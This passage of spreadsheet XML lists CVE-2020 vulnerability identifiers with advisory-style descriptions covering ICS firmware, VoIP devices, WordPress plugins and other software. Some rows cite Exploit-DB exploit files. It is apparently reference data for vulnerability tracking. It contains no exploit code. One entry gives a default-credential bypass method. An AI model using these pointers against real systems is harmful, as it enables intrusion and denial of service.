    <t>Cross-site scripting vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to inject an arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5651</t>
  </si>
  <si>
    <t>SQL injection vulnerability in Simple Download Monitor 3.8.8 and earlier allows remote attackers to execute arbitrary SQL commands via a specially crafted URL.</t>
  </si>
  <si>
    <t>CVE-2020-5652</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption vulnerability in Ethernet Port on MELSEC iQ-R, Q and L series CPU modules (R 00/01/02 CPU firmware versions '20' and earlier, R 04/08/16/32/120 (EN) CPU firmware versions '52' and earlier, R 08/16/32/120 SFCPU firmware versions '22' and earlier, R 08/16/32/120 PCPU all versions, R 08/16/32/120 PSFCPU all versions, R 16/32/64 MTCPU all versions, Q03 UDECPU, Q 04/06/10/13/20/26/50/100 UDEHCPU serial number '22081' and earlier , Q 03/04/06/13/26 UDVCPU serial number '22031' and earlier, Q 04/06/13/26 UDPVCPU serial number '22031' and earlier, Q 172/173 DCPU all versions, Q 172/173 DSCPU all versions, Q 170 MCPU all versions, Q 170 MSCPU all versions, L 02/06/26 CPU (-P) and L 26 CPU - (P) BT all versions) allows a remote unauthenticated attacker to stop the Ethernet communication functions of the products via a specially crafted packet, which may lead to a denial of service (DoS) condition .</t>
  </si>
  <si>
    <t>CVE-2020-5653</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5654</t>
  </si>
  <si>
    <t>Session fixation vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5655</t>
  </si>
  <si>
    <t>NULL pointer dereferences vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5656</t>
  </si>
  <si>
    <t>Improper access control vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows a remote unauthenticated attacker to stop the network functions of the products or execute a malicious program via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5657</t>
  </si>
  <si>
    <t>Improper neutralization of argument delimiters in a command ('Argument Injection') vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows unauthenticated attackers on adjacent network to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5658</t>
  </si>
  <si>
    <t>Resource Management Errors vulnerability in TCP/IP function included in the firmware of MELSEC iQ-R series (RJ71EIP91 EtherNet/IP Network Interface Module First 2 digits of serial number are '02' or before, RJ71PN92 PROFINET IO Controller Module First 2 digits of serial number are '01' or before, RD81DL96 High Speed Data Logger Module First 2 digits of serial number are '08' or before, RD81MES96N MES Interface Module First 2 digits of serial number are '04' or before, and RD81OPC96 OPC UA Server Module First 2 digits of serial number are '04' or before) allows a remote unauthenticated attacker to stop the network functions of the products via a specially crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-5659</t>
  </si>
  <si>
    <t>SQL injection vulnerability in the XooNIps 3.49 and earlier allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5662</t>
  </si>
  <si>
    <t>Reflected cross-site scripting vulnerability in XooNIps 3.49 and earlier allows remote authenticated attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5663</t>
  </si>
  <si>
    <t>Stored cross-site scripting vulnerability in XooNIps 3.49 and earlier allows remote authenticated attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5664</t>
  </si>
  <si>
    <t>Deserialization of untrusted data vulnerability in XooNIps 3.49 and earlier allows remote attackers to execute arbitrary code via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5665</t>
  </si>
  <si>
    <t>Improper check or handling of exceptional conditions in MELSEC iQ-F series FX5U(C) CPU unit firmware version 1.060 and earlier allows an attacker to cause a denial-of-service (DoS) condition on program execution and communication by sending a specially crafted ARP packet.</t>
  </si>
  <si>
    <t>CVE-2020-5666</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption vulnerability in MELSEC iQ-R Series CPU Modules (R00/01/02CPU Firmware versions from '05' to '19' and R04/08/16/32/120(EN)CPU Firmware versions from '35' to '51') allows a remote attacker to cause an error in a CPU unit via a specially crafted HTTP packet, which may lead to a denial-of-service (DoS) condition in execution of the program and its communication.</t>
  </si>
  <si>
    <t>CVE-2020-5667</t>
  </si>
  <si>
    <t>Studyplus App for Android v6.3.7 and earlier and Studyplus App for iOS v8.29.0 and earlier use a hard-coded API key for an external service. By exploiting this vulnerability, API key for an external service may be obtained by analyzing data in the app.</t>
  </si>
  <si>
    <t>CVE-2020-5668</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption vulnerability in MELSEC iQ-R Series modules (R00/01/02CPU firmware version '19' and earlier, R04/08/16/32/120 (EN) CPU firmware version '51' and earlier, R08/16/32/120SFCPU firmware version '22' and earlier, R08/16/32/120PCPU firmware version '25' and earlier, R08/16/32/120PSFCPU firmware version '06' and earlier, RJ71EN71 firmware version '47' and earlier, RJ71GF11-T2 firmware version '47' and earlier, RJ72GF15-T2 firmware version '07' and earlier, RJ71GP21-SX firmware version '47' and earlier, RJ71GP21S-SX firmware version '47' and earlier, and RJ71GN11-T2 firmware version '11' and earlier) allows a remote unauthenticated attacker to cause an error in a CPU unit and cause a denial-of-service (DoS) condition in execution of the program and its communication, or to cause a denial-of-service (DoS) condition in communication via the unit by receiving a specially crafted SLMP packet</t>
  </si>
  <si>
    <t>CVE-2020-5669</t>
  </si>
  <si>
    <t>Cross-site scripting vulnerability in Movable Type Movable Type Premium 1.37 and earlier and Movable Type Premium Advanced 1.37 and earlier allows a remote authenticated attacker to inject an arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5674</t>
  </si>
  <si>
    <t>Untrusted search path vulnerability in the installers of multiple SEIKO EPSON products allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.</t>
  </si>
  <si>
    <t>CVE-2020-5675</t>
  </si>
  <si>
    <t>Out-of-bounds read vulnerability in GT21 model of GOT2000 series (GT2107-WTBD V01.39.000 and earlier, GT2107-WTSD V01.39.000 and earlier, GT2104-RTBD V01.39.000 and earlier, GT2104-PMBD V01.39.000 and earlier, and GT2103-PMBD V01.39.000 and earlier), GS21 model of GOT series (GS2110-WTBD V01.39.000 and earlier, GS2107-WTBD V01.39.000 and earlier, GS2110-WTBD-N V01.39.000 and earlier, and GS2107-WTBD-N V01.39.000 and earlier), and Tension Controller LE7-40GU-L series (LE7-40GU-L Screen package data for CC-Link IEF Basic V1.00, LE7-40GU-L Screen package data for MODBUS/TCP V1.00, and LE7-40GU-L Screen package data for SLMP V1.00) allows a remote attacker to cause a denial-of-service (DoS) condition by sending a specially crafted packet. As a result, deterioration of communication performance or a denial-of-service (DoS) condition of the TCP communication functions of the products may occur.</t>
  </si>
  <si>
    <t>CVE-2020-5676</t>
  </si>
  <si>
    <t>GROWI v4.1.3 and earlier allow remote attackers to obtain information which is not allowed to access via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5677</t>
  </si>
  <si>
    <t>Reflected cross-site scripting vulnerability in GROWI v4.0.0 and earlier allows remote attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5678</t>
  </si>
  <si>
    <t>Stored cross-site scripting vulnerability in GROWI v3.8.1 and earlier allows remote attackers to inject arbitrary script via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5679</t>
  </si>
  <si>
    <t>Improper restriction of rendered UI layers or frames in EC-CUBE versions from 3.0.0 to 3.0.18 leads to clickjacking attacks. If a user accesses a specially crafted page while logged into the administrative page, unintended operations may be conducted.</t>
  </si>
  <si>
    <t>CVE-2020-5680</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in EC-CUBE versions from 3.0.5 to 3.0.18 allows a remote attacker to cause a denial-of-service (DoS) condition via unspecified vector.</t>
  </si>
  <si>
    <t>CVE-2020-5681</t>
  </si>
  <si>
    <t>Untrusted search path vulnerability in self-extracting files created by EpsonNet SetupManager versions 2.2.14 and earlier, and Offirio SynergyWare PrintDirector versions 1.6x/1.6y and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.</t>
  </si>
  <si>
    <t>CVE-2020-5682</t>
  </si>
  <si>
    <t>Improper input validation in GROWI versions prior to v4.2.3 (v4.2 Series), GROWI versions prior to v4.1.12 (v4.1 Series), and GROWI v3 series and earlier GROWI versions prior to v4.2.3 (v4.2 Series), GROWI versions prior to v4.1.12 (v4.1 Series), and GROWI v3 series and earlier allows remote attackers to cause a denial of service via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2020-5683</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in GROWI versions prior to v4.2.3 (v4.2 Series), GROWI versions prior to v4.1.12 (v4.1 Series), and GROWI v3 series and earlier GROWI versions prior to v4.2.3 (v4.2 Series), GROWI versions prior to v4.1.12 (v4.1 Series), and GROWI v3 series and earlier allows remote attackers to alter the data by uploading a specially crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-5684</t>
  </si>
  <si>
    <t>iSM client versions from V5.1 prior to V12.1 running on NEC Storage Manager or NEC Storage Manager Express does not verify a server certificate properly, which allows a man-in-the-middle attacker to eavesdrop on an encrypted communication or alter the communication via a crafted certificate.</t>
  </si>
  <si>
    <t>CVE-2020-5685</t>
  </si>
  <si>
    <t>UNIVERGE SV9500 series from V1 to V7and SV8500 series from S6 to S8 allows an attacker to execute arbitrary OS commands or cause a denial-of-service (DoS) condition by sending a specially crafted request to a specific URL.</t>
  </si>
  <si>
    <t>CVE-2020-5686</t>
  </si>
  <si>
    <t>Incorrect implementation of authentication algorithm issue in UNIVERGE SV9500 series from V1 to V7and SV8500 series from S6 to S8 allows an attacker to access the remote system maintenance feature and obtain the information by sending a specially crafted request to a specific URL.</t>
  </si>
  <si>
    <t>CVE-2020-5720</t>
  </si>
  <si>
    <t>MikroTik WinBox before 3.21 is vulnerable to a path traversal vulnerability that allows creation of arbitrary files wherevere WinBox has write permissions. WinBox is vulnerable to this attack if it connects to a malicious endpoint or if an attacker mounts a man in the middle attack.</t>
  </si>
  <si>
    <t>CVE-2020-5721</t>
  </si>
  <si>
    <t>MikroTik WinBox 3.22 and below stores the user's cleartext password in the settings.cfg.viw configuration file when the Keep Password field is set and no Master Password is set. Keep Password is set by default and, by default Master Password is not set. An attacker with access to the configuration file can extract a username and password to gain access to the router.</t>
  </si>
  <si>
    <t>CVE-2020-5722</t>
  </si>
  <si>
    <t>The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48247.py</t>
  </si>
  <si>
    <t>UCM6202 1.0.18.13 - Remote Command Injection</t>
  </si>
  <si>
    <t>2020-03-24</t>
  </si>
  <si>
    <t>CVE-2020-5723</t>
  </si>
  <si>
    <t>The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5724</t>
  </si>
  <si>
    <t>The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords.</t>
  </si>
  <si>
    <t>CVE-2020-5725</t>
  </si>
  <si>
    <t>The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords.</t>
  </si>
  <si>
    <t>CVE-2020-5726</t>
  </si>
  <si>
    <t>The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48270.py</t>
  </si>
  <si>
    <t>Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection</t>
  </si>
  <si>
    <t>CVE-2020-5727</t>
  </si>
  <si>
    <t>Authentication bypass using an alternate path or channel in SimpliSafe SS3 firmware 1.4 allows a local, unauthenticated attacker to pair a rogue keypad to an armed system.</t>
  </si>
  <si>
    <t>CVE-2020-5728</t>
  </si>
  <si>
    <t>OpenMRS 2.9 and prior copies "Referrer" header values into an html element named "redirectUrl" within many webpages (such as login.htm). There is insufficient validation for this parameter, which allows for the possibility of cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-5729</t>
  </si>
  <si>
    <t>In OpenMRS 2.9 and prior, the UI Framework Error Page reflects arbitrary, user-supplied input back to the browser, which can result in XSS. Any page that is able to trigger a UI Framework Error is susceptible to this issue.</t>
  </si>
  <si>
    <t>CVE-2020-5730</t>
  </si>
  <si>
    <t>In OpenMRS 2.9 and prior, the sessionLocation parameter for the login page is vulnerable to cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-5731</t>
  </si>
  <si>
    <t>In OpenMRS 2.9 and prior, the app parameter for the ActiveVisit's page is vulnerable to cross-site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-5732</t>
  </si>
  <si>
    <t>In OpenMRS 2.9 and prior, he import functionality of the Data Exchange Module does not properly redirect to a login page when an unauthenticated user attempts to access it. This allows unauthenticated users to use a feature typically restricted to administrators.</t>
  </si>
  <si>
    <t>CVE-2020-5733</t>
  </si>
  <si>
    <t>In OpenMRS 2.9 and prior, the export functionality of the Data Exchange Module does not properly redirect to a login page when an unauthenticated user attempts to access it. This allows the export of potentially sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-5734</t>
  </si>
  <si>
    <t>Classic buffer overflow in SolarWinds Dameware allows a remote, unauthenticated attacker to cause a denial of service by sending a large 'SigPubkeyLen' during ECDH key exchange.</t>
  </si>
  <si>
    <t>CVE-2020-5735</t>
  </si>
  <si>
    <t>Amcrest cameras and NVR are vulnerable to a stack-based buffer overflow over port 37777. An authenticated remote attacker can abuse this issue to crash the device and possibly execute arbitrary code.</t>
  </si>
  <si>
    <t>exploits/hardware/dos/48304.py</t>
  </si>
  <si>
    <t>Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)</t>
  </si>
  <si>
    <t>2020-04-08</t>
  </si>
  <si>
    <t>CVE-2020-5736</t>
  </si>
  <si>
    <t>Amcrest cameras and NVR are vulnerable to a null pointer dereference over port 37777. An authenticated remote attacker can abuse this issue to crash the device.</t>
  </si>
  <si>
    <t>CVE-2020-5737</t>
  </si>
  <si>
    <t>Stored XSS in Tenable.Sc before 5.14.0 could allow an authenticated remote attacker to craft a request to execute arbitrary script code in a user's browser session. Updated input validation techniques have been implemented to correct this issue.</t>
  </si>
  <si>
    <t>CVE-2020-5738</t>
  </si>
  <si>
    <t>Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker uploads a specially crafted tar file to the HTTP /cgi-bin/upload_vpntar interface.</t>
  </si>
  <si>
    <t>CVE-2020-5739</t>
  </si>
  <si>
    <t>Grandstream GXP1600 series firmware 1.0.4.152 and below is vulnerable to authenticated remote command execution when an attacker adds an OpenVPN up script to the phone's VPN settings via the "Additional Settings" field in the web interface. When the VPN's connection is established, the user defined script is executed with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5740</t>
  </si>
  <si>
    <t>Improper Input Validation in Plex Media Server on Windows allows a local, unauthenticated attacker to execute arbitrary Python code with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-5741</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data in Plex Media Server on Windows allows a remote, authenticated attacker to execute arbitrary Python code.</t>
  </si>
  <si>
    <t>CVE-2020-5742</t>
  </si>
  <si>
    <t>Improper Access Control in Plex Media Server prior to June 15, 2020 allows any origin to execute cross-origin application requests.</t>
  </si>
  <si>
    <t>CVE-2020-5743</t>
  </si>
  <si>
    <t>Improper Control of Resource Identifiers in TCExam 14.2.2 allows a remote, authenticated attacker to access test metadata for which they don't have permission.</t>
  </si>
  <si>
    <t>CVE-2020-5744</t>
  </si>
  <si>
    <t>Relative Path Traversal in TCExam 14.2.2 allows a remote, authenticated attacker to read the contents of arbitrary files on disk.</t>
  </si>
  <si>
    <t>CVE-2020-5745</t>
  </si>
  <si>
    <t>Cross-site request forgery in TCExam 14.2.2 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-5746</t>
  </si>
  <si>
    <t>Insufficient output sanitization in TCExam 14.2.2 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by creating a crafted test.</t>
  </si>
  <si>
    <t>CVE-2020-5747</t>
  </si>
  <si>
    <t>CVE-2020-5748</t>
  </si>
  <si>
    <t>Insufficient output sanitization in TCExam 14.2.2 allows a remote, unauthenticated attacker to conduct persistent cross-site scripting (XSS) attacks via the self-registration feature.</t>
  </si>
  <si>
    <t>CVE-2020-5749</t>
  </si>
  <si>
    <t>Insufficient output sanitization in TCExam 14.2.2 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by creating a crafted group.</t>
  </si>
  <si>
    <t>CVE-2020-5750</t>
  </si>
  <si>
    <t>CVE-2020-5751</t>
  </si>
  <si>
    <t>Insufficient output sanitization in TCExam 14.2.2 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by creating a crafted operator.</t>
  </si>
  <si>
    <t>CVE-2020-5752</t>
  </si>
  <si>
    <t>Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges.</t>
  </si>
  <si>
    <t>exploits/windows/local/49211.ps1</t>
  </si>
  <si>
    <t>Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)</t>
  </si>
  <si>
    <t>2020-12-07</t>
  </si>
  <si>
    <t>CVE-2020-5753</t>
  </si>
  <si>
    <t>Signal Private Messenger Android v4.59.0 and up and iOS v3.8.1.5 and up allows a remote non-contact to ring a victim's Signal phone and disclose currently used DNS server due to ICE Candidate handling before call is answered or declined.</t>
  </si>
  <si>
    <t>CVE-2020-5754</t>
  </si>
  <si>
    <t>Webroot endpoint agents prior to version v9.0.28.48 allows remote attackers to trigger a type confusion vulnerability over its listening TCP port, resulting in crashing or reading memory contents of the Webroot endpoint agent.</t>
  </si>
  <si>
    <t>CVE-2020-5755</t>
  </si>
  <si>
    <t>Webroot endpoint agents prior to version v9.0.28.48 did not protect the "%PROGRAMDATA%\WrData\PKG" directory against renaming. This could allow attackers to trigger a crash or wait upon Webroot service restart to rewrite and hijack dlls in this directory for privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-5756</t>
  </si>
  <si>
    <t>Grandstream GWN7000 firmware version 1.0.9.4 and below allows authenticated remote users to modify the system's crontab via undocumented API. An attacker can use this functionality to execute arbitrary OS commands on the router.</t>
  </si>
  <si>
    <t>CVE-2020-5757</t>
  </si>
  <si>
    <t>Grandstream UCM6200 series firmware version 1.0.20.23 and below is vulnerable to OS command injection via HTTP. An authenticated remote attacker can bypass command injection mitigations and execute commands as the root user by sending a crafted HTTP POST to the UCM's "New" HTTPS API.</t>
  </si>
  <si>
    <t>CVE-2020-5758</t>
  </si>
  <si>
    <t>Grandstream UCM6200 series firmware version 1.0.20.23 and below is vulnerable to OS command injection via HTTP. An authenticated remote attacker can execute commands as the root user by sending a crafted HTTP GET to the UCM's "Old" HTTPS API.</t>
  </si>
  <si>
    <t>CVE-2020-5759</t>
  </si>
  <si>
    <t>Grandstream UCM6200 series firmware version 1.0.20.23 and below is vulnerable to OS command injection via SSH. An authenticated remote attacker can execute commands as the root user by issuing a specially crafted "unset" command.</t>
  </si>
  <si>
    <t>CVE-2020-5760</t>
  </si>
  <si>
    <t>Grandstream HT800 series firmware version 1.0.17.5 and below is vulnerable to an OS command injection vulnerability. Unauthenticated remote attackers can execute arbitrary commands as root by crafting a special configuration file and sending a crafted SIP message.</t>
  </si>
  <si>
    <t>CVE-2020-5761</t>
  </si>
  <si>
    <t>Grandstream HT800 series firmware version 1.0.17.5 and below is vulnerable to CPU exhaustion due to an infinite loop in the TR-069 service. Unauthenticated remote attackers can trigger this case by sending a one character TCP message to the TR-069 service.</t>
  </si>
  <si>
    <t>CVE-2020-5762</t>
  </si>
  <si>
    <t>Grandstream HT800 series firmware version 1.0.17.5 and below is vulnerable to a denial of service attack against the TR-069 service. An unauthenticated remote attacker can stop the service due to a NULL pointer dereference in the TR-069 service. This condition is triggered due to mishandling of the HTTP Authentication field.</t>
  </si>
  <si>
    <t>CVE-2020-5763</t>
  </si>
  <si>
    <t>Grandstream HT800 series firmware version 1.0.17.5 and below contain a backdoor in the SSH service. An authenticated remote attacker can obtain a root shell by correctly answering a challenge prompt.</t>
  </si>
  <si>
    <t>CVE-2020-5764</t>
  </si>
  <si>
    <t>MX Player Android App versions prior to v1.24.5, are vulnerable to a directory traversal vulnerability when user is using the MX Transfer feature in "Receive" mode. An attacker can exploit this by connecting to the MX Transfer session as a "sender" and sending a MessageType of "FILE_LIST" with a "name" field containing directory traversal characters (../). This will result in the file being transferred to the victim's phone, but being saved outside of the intended "/sdcard/MXshare" directory. In some instances, an attacker can achieve remote code execution by writing ".odex" and ".vdex" files in the "oat" directory of the MX Player application.</t>
  </si>
  <si>
    <t>CVE-2020-5765</t>
  </si>
  <si>
    <t>Nessus 8.10.0 and earlier were found to contain a Stored XSS vulnerability due to improper validation of input during scan configuration. An authenticated, remote attacker could potentially exploit this vulnerability to execute arbitrary code in a user's session. Tenable has implemented additional input validation mechanisms to correct this issue in Nessus 8.11.0.</t>
  </si>
  <si>
    <t>CVE-2020-5766</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in SRS Simple Hits Counter Plugin for WordPress 1.0.3 and 1.0.4 allows a remote, unauthenticated attacker to determine the value of database fields.</t>
  </si>
  <si>
    <t>CVE-2020-5767</t>
  </si>
  <si>
    <t>Cross-site request forgery in Icegram Email Subscribers &amp; Newsletters Plugin for WordPress v4.4.8 allows a remote attacker to send forged emails by tricking legitimate users into clicking a crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-5768</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Icegram Email Subscribers &amp; Newsletters Plugin for WordPress v4.4.8 allows a remote, authenticated attacker to determine the value of database fields.</t>
  </si>
  <si>
    <t>CVE-2020-5769</t>
  </si>
  <si>
    <t>Insufficient output sanitization in Teltonika firmware TRB2_R_00.02.02 allows a remote, authenticated attacker to conduct persistent cross-site scripting (XSS) attacks by injecting malicious client-side code into the 'URL/ Host / Connection' form in the 'DATA TO SERVER' configuration section.</t>
  </si>
  <si>
    <t>CVE-2020-5770</t>
  </si>
  <si>
    <t>Cross-site request forgery in Teltonika firmware TRB2_R_00.02.04.01 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-5771</t>
  </si>
  <si>
    <t>Improper Input Validation in Teltonika firmware TRB2_R_00.02.04.01 allows a remote, authenticated attacker to gain root privileges by uploading a malicious backup archive.</t>
  </si>
  <si>
    <t>CVE-2020-5772</t>
  </si>
  <si>
    <t>Improper Input Validation in Teltonika firmware TRB2_R_00.02.04.01 allows a remote, authenticated attacker to gain root privileges by uploading a malicious package file.</t>
  </si>
  <si>
    <t>CVE-2020-5773</t>
  </si>
  <si>
    <t>Improper Access Control in Teltonika firmware TRB2_R_00.02.04.01 allows a low privileged user to perform unauthorized write operations.</t>
  </si>
  <si>
    <t>CVE-2020-5774</t>
  </si>
  <si>
    <t>Nessus versions 8.11.0 and earlier were found to maintain sessions longer than the permitted period in certain scenarios. The lack of proper session expiration could allow attackers with local access to login into an existing browser session.</t>
  </si>
  <si>
    <t>CVE-2020-5775</t>
  </si>
  <si>
    <t>Server-Side Request Forgery in Canvas LMS 2020-07-29 allows a remote, unauthenticated attacker to cause the Canvas application to perform HTTP GET requests to arbitrary domains.</t>
  </si>
  <si>
    <t>CVE-2020-5776</t>
  </si>
  <si>
    <t>Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.</t>
  </si>
  <si>
    <t>CVE-2020-5777</t>
  </si>
  <si>
    <t>MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. A remote attacker can trigger this connection failure if the Mysql setting max_connections (default 151) is lower than Apache (or another web server) setting MaxRequestWorkers (formerly MaxClients) (default 256). This can be done by sending at least 151 simultaneous requests to the Magento website to trigger a "Too many connections" error, then use default magmi:magmi basic authentication to remotely bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2020-5778</t>
  </si>
  <si>
    <t>A flaw exists in Trading Technologies Messaging 7.1.28.3 (ttmd.exe) due to improper validation of user-supplied data when processing a type 8 message sent to default TCP RequestPort 10200. An unauthenticated, remote attacker can exploit this issue, via a specially crafted message, to terminate ttmd.exe.</t>
  </si>
  <si>
    <t>CVE-2020-5779</t>
  </si>
  <si>
    <t>A flaw in Trading Technologies Messaging 7.1.28.3 (ttmd.exe) relates to invalid parameter handling when calling strcpy_s() with an invalid parameter (i.e., a long src string parameter) as a part of processing a type 4 message sent to default TCP RequestPort 10200. It's been observed that ttmd.exe terminates as a result.</t>
  </si>
  <si>
    <t>CVE-2020-5780</t>
  </si>
  <si>
    <t>Missing Authentication for Critical Function in Icegram Email Subscribers &amp; Newsletters Plugin for WordPress prior to version 4.5.6 allows a remote, unauthenticated attacker to conduct unauthenticated email forgery/spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-5781</t>
  </si>
  <si>
    <t>In IgniteNet HeliOS GLinq v2.2.1 r2961, the langSelection parameter is stored in the luci configuration file (/etc/config/luci) by the authenticator.htmlauth function. When modified with arbitrary javascript, this causes a denial-of-service condition for all other users.</t>
  </si>
  <si>
    <t>CVE-2020-5782</t>
  </si>
  <si>
    <t>In IgniteNet HeliOS GLinq v2.2.1 r2961, if a user logs in and sets the ‘wan_type’ parameter, the wan interface for the device will become unreachable, which results in a denial of service condition for devices dependent on this connection.</t>
  </si>
  <si>
    <t>CVE-2020-5783</t>
  </si>
  <si>
    <t>In IgniteNet HeliOS GLinq v2.2.1 r2961, the login functionality does not contain any CSRF protection mechanisms.</t>
  </si>
  <si>
    <t>CVE-2020-5784</t>
  </si>
  <si>
    <t>Server-Side Request Forgery in Teltonika firmware TRB2_R_00.02.04.3 allows a low privileged user to cause the application to perform HTTP GET requests to arbitrary URLs.</t>
  </si>
  <si>
    <t>CVE-2020-5785</t>
  </si>
  <si>
    <t>Insufficient output sanitization in Teltonika firmware TRB2_R_00.02.04.3 allows an unauthenticated attacker to conduct reflected cross-site scripting via a crafted ‘action’ or ‘pkg_name’ parameter.</t>
  </si>
  <si>
    <t>CVE-2020-5786</t>
  </si>
  <si>
    <t>Cross-site request forgery in Teltonika firmware TRB2_R_00.02.04.3 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link.</t>
  </si>
  <si>
    <t>CVE-2020-5787</t>
  </si>
  <si>
    <t>Relative Path Traversal in Teltonika firmware TRB2_R_00.02.04.3 allows a remote, authenticated attacker to delete arbitrary files on disk via the admin/services/packages/remove action.</t>
  </si>
  <si>
    <t>CVE-2020-5788</t>
  </si>
  <si>
